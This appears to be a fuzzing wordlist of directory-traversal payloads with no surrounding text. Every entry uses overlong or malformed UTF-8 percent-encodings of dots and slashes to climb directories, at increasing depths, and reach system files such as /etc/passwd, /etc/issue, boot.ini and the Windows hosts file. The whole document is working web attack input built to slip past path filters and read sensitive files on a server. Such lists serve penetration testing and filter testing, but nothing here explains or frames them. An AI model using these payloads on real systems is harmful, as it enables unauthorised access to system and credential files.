-%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afpasswd -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afetc%c0%afissue -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%af%f0%80%80%ae%f0%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cpasswd -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cetc%c0%5cissue -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cetc%c1%9cissue -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9c%f0%80%80%ae%f0%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcpasswd -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcetc%c1%pcissue -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pc%f0%80%80%ae%f0%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vpasswd -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vetc%c0%9vissue -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9v%f0%80%80%ae%f0%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue -%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue 